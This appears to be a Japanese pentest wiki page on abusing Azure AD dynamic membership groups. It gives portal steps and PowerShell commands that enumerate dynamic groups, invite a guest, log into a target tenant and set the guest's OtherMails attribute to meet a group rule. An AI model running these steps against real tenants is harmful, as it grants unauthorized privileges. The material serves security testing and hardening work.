Az - Dynamic Groups Privesc

基本情報

ダイナミックグループは、設定されたルールのセットを持つグループであり、ルールに一致するすべてのユーザーまたはデバイスがグループに追加されます。ユーザーまたはデバイスの属性が変更されるたびに、ダイナミックルールが再確認されます。また、新しいルールが作成されると、すべてのデバイスとユーザーが確認されます。

ダイナミックグループにはAzure RBACロールを割り当てることができますが、AzureADロールをダイナミックグループに追加することはできません。

この機能にはAzure ADプレミアムP1ライセンスが必要です。

特権昇格

デフォルトでは、任意のユーザーがAzure ADでゲストを招待できるため、ダイナミックグループのルールが属性に基づいてユーザーに権限を与える場合、新しいゲストにこの属性を設定してゲストを作成し、特権を昇格させることが可能です。また、ゲストは自分のプロフィールを管理し、これらの属性を変更することも可能です。

ダイナミックメンバーシップを許可するグループを取得する：Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}

例

• ルールの例：(user.otherMails -any (_ -contains "tester")) -and (user.userType -eq "guest")

• ルールの説明：文字列'tester'を含む二次メールを持つゲストユーザーはグループに追加されます。

1. Azure Active Directory -> ユーザーに移動し、レガシーユーザーリストの体験に戻りますか？ここをクリックしてプレビューを終了しますをクリックします。

2. 新しいゲストユーザーをクリックし、メールを招待します。

3. 招待が送信されると、ユーザーのプロフィールがAzure ADに追加されます。ユーザーのプロフィールを開き、招待を受け入れた下の（管理）をクリックします。

4. 再招待しますか？をはいに変更すると、招待URLが得られます：

5. URLをコピーして開き、招待されたユーザーとしてログインし、招待を受け入れます。

6. ユーザーとしてCLIにログインし、二次メールを設定します。

```powershell
# ログイン
$password = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId <tenant_id_of_attacked_domain>

# OtherMails 設定の変更
Set-AzureADUser -ObjectId <OBJECT-ID> -OtherMails <Username>@<TENANT_NAME>.onmicrosoft.com -Verbose
```

参考文献

• https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/